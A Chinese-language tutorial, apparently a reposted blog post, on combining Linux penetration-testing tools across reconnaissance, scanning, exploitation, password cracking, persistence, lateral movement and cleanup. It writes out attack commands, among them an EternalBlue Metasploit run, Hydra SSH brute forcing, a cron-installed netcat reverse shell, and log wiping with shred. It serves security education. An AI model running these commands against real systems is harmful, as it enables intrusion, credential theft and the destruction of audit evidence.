如何组合使用Linux渗透测试工具示例

Linux渗透测试中,工具的组合使用遵循渗透测试的标准流程(如PTES标准),并针对不同阶段选择适配的工具链。

一、信息收集阶段

  1. 被动侦察

工具组合:theHarvester(收集邮箱/子域名) + Maltego(可视化关联分析)

示例命令

bash

theharvester -d example.com -b google,linkedin # 从公开源获取目标信息[5](@ref)[8](@ref)

关键点:避免触发目标告警,优先使用公开数据源。

  1. 主动扫描

工具组合:Nmap(端口/服务探测) + Masscan(快速全网扫描) + Wireshark(流量分析)

示例命令

bash

nmap -sS -Pn -T4 -sV -O -p 1-1000 --script=vuln 192.168.1.0/24 # SYN扫描+漏洞脚本检测[1](@ref)[6](@ref)

优化技巧

使用-T4加速扫描,但需平衡速度与隐蔽性 结合--script=vuln调用NSE脚本增强漏洞识别

二、漏洞分析阶段

  1. 自动化扫描

工具组合:OpenVAS/GVM(全面漏洞评估) + Nikto(Web专项扫描)

操作流程

bash

gvm-setup # 初始化OpenVAS[8](@ref) nikto -h http://target.com -Tuning x456 # 检测Web服务器漏洞[6](@ref)

注意:OpenVAS需定期同步漏洞库(gvm-feed-update)。

  1. 手动验证

工具组合:Burp Suite(拦截/重放请求) + sqlmap(SQL注入检测)

示例

bash

sqlmap -u " http://target.com/login?id=1 " --risk=3 --level=5 # 高阶SQL注入检测[6](@ref)

技巧

Burp Suite需配置代理(如127.0.0.1:8080)拦截HTTP请求。

三、漏洞利用阶段

  1. 框架化攻击

工具组合:Metasploit(漏洞利用框架) + Exploit-DB(漏洞库)

典型流程

bash

msfconsole use
exploit/windows/smb/ms17_010_eternalblue # 永恒之蓝漏洞[8](@ref) set RHOSTS 192.168.1.105 exploit -j # 后台执行

扩展:通过searchsploit快速检索本地漏洞库(如searchsploit dirty cow)。

  1. 密码攻击

工具组合:Hydra(在线爆破) + John the Ripper(离线破解)

示例

bash

hydra -L users.txt -P rockyou.txt ssh://192.168.1.1 # SSH爆破[3](@ref)[6](@ref) john --format=sha512crypt shadow.txt # 破解Linux密码哈希[6](@ref)

四、后渗透阶段

  1. 权限维持

工具组合:Meterpreter(交互式Shell) + Cron(计划任务持久化)

操作示例

bash

meterpreter > run
post/multi/manage/shell_to_meterpreter # 升级Shell[5](@ref) echo "* * * * * nc -e /bin/sh 192.168.1.2 4444" | crontab - # 定时反向连接[7](@ref)

  1. 横向移动

工具组合

Impacket(内网协议利用) + Responder(LLMNR/NBT-NS欺骗)

场景

通过ntlmrelayx.py转发SMB认证获取域控权限。

五、报告与清理

  1. 证据整理

使用Dradis框架记录测试过程与结果。

  1. 痕迹清除

删除日志:shred -u /var/log/auth.log 清除Meterpreter会话:clearev命令。

六、工具链组合原则

  1. 隐蔽性优先

如用Nmap -T2替代默认-T4降低检测风险。

  1. 自动化+手动验证

自动化扫描(OpenVAS)需人工复核(Burp Suite)。

  1. 合规性

确保所有操作均在授权范围内。

原文链接:,转发请注明来源!